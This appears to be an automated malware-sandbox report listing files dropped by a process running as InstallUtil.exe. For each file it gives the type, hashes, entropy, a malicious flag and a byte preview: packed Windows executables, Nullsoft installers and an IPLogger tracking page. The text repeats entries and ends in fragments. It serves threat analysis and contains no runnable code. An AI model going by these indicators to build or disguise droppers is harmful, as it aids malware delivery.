                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.768479757261426
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:1nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHa:sWqlkLESgCRE/vhOjb05efd6e/oXHa
                                                                                                                          MD5:A0D1C072888977A5E55107B2D2F98FAF
                                                                                                                          SHA1:A2F814E9731FFD69DAD8411F7CFB16B3D2DD854E
                                                                                                                          SHA-256:6700F95EA178FA72785C2D3D615FC4C4DB5662E0122CA3AF55ABE8869CE91CB8
                                                                                                                          SHA-512:984B36DDE0C1C044A7FE70E089C81B63925B178644BE646653C1BB171EFD72EBF88BE5D6D67FE462A7AC976B58298E77DC5C164DC658E798635EF66D2BC56DC4
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....!0-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.768479767034927
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:2nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHI:lWqlkLESgCRE/vhOjb05efd6e/oXHI
                                                                                                                          MD5:442BA51AC0AF3E8D9F489F643AFA6268
                                                                                                                          SHA1:681867F9C25D27319DA3C197E5506CDA0FDDA36A
                                                                                                                          SHA-256:7974CDC50115E1D48544C30E120A7AF883B0B71281A17245100B197E282D4D51
                                                                                                                          SHA-512:F5C3350AF33AA92160989A0CF48605C49CEDDBBCD70849A4BD5974786A9BD912FF5102D6B984C434A8FF93C682625222D84988A7F711D81C8E2A3EA28D9028BC
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.7684742788158045
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:TnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHQ:eWqlkLESgCRE/vhOjb05efd6e/oXHQ
                                                                                                                          MD5:45D3B5DA2599B55F638873CE9E5AF959
                                                                                                                          SHA1:A7D1E4BB85ACF0704795888C122F6F3B5061BB24
                                                                                                                          SHA-256:407EF2E99461CD63A29508433B363DE754413E387125C5EDF0BBD63D293B8AA8
                                                                                                                          SHA-512:8198EDB0D87C211F444D862AD2E8B277FBC36CBEF659E9E2F1E40DBCD7EE5E5EBA37F6A06461D67BD2D95F7B5BE2137182626F7BA20620BBA80E9F2EC7D1BD93
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1956920
                                                                                                                          Entropy (8bit):7.99369020397791
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:49152:C9wV5EQOw+7MS5M5jPezvsHgBbanIh7CfEfd8Xzi4Wm:MwUQOzr5M57oUibanIkfEfqDiu
                                                                                                                          MD5:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          SHA1:2432F8F65BEC3540FE8C645092AB70C45524B02B
                                                                                                                          SHA-256:B81490ECECB4BA976D2B5B095B0574042547E341F465EF4574AFC3DA9544EC1A
                                                                                                                          SHA-512:50931F42899213D6549E69DCBBAB5F0B266010930BAD37125D392195E5A24579D6DBDA79AD9AAFE6044333F2B7835F8DBDDFC5B4198B5C097A275ED3C69A7C74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):175104
Entropy (8bit):6.135102131058025
Encrypted:false
SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
MD5:89B400AF781E7D55812A77260DC1D9C8
SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
Malicious:true
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146090
Entropy (8bit):7.982011327302058
Encrypted:false
SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
MD5:0D69DD3893505245669619A06840C2FE
SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
Malicious:true
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1956920
Entropy (8bit):7.99369020397791
Encrypted:true
SSDEEP:49152:C9wV5EQOw+7MS5M5jPezvsHgBbanIh7CfEfd8Xzi4Wm:MwUQOzr5M57oUibanIkfEfqDiu
MD5:17B5157E8F35F33EB2325EE5751BCF3B
SHA1:2432F8F65BEC3540FE8C645092AB70C45524B02B
SHA-256:B81490ECECB4BA976D2B5B095B0574042547E341F465EF4574AFC3DA9544EC1A
SHA-512:50931F42899213D6549E69DCBBAB5F0B266010930BAD37125D392195E5A24579D6DBDA79AD9AAFE6044333F2B7835F8DBDDFC5B4198B5C097A275ED3C69A7C74
Malicious:true
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:49152:C9wV5EQOw+7MS5M5jPezvsHgBbanIh7CfEfd8Xzi4Wm:MwUQOzr5M57oUibanIkfEfqDiu
                                                                                                                          MD5:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          SHA1:2432F8F65BEC3540FE8C645092AB70C45524B02B
                                                                                                                          SHA-256:B81490ECECB4BA976D2B5B095B0574042547E341F465EF4574AFC3DA9544EC1A
                                                                                                                          SHA-512:50931F42899213D6549E69DCBBAB5F0B266010930BAD37125D392195E5A24579D6DBDA79AD9AAFE6044333F2B7835F8DBDDFC5B4198B5C097A275ED3C69A7C74
                                                                                                                          Malicious:true
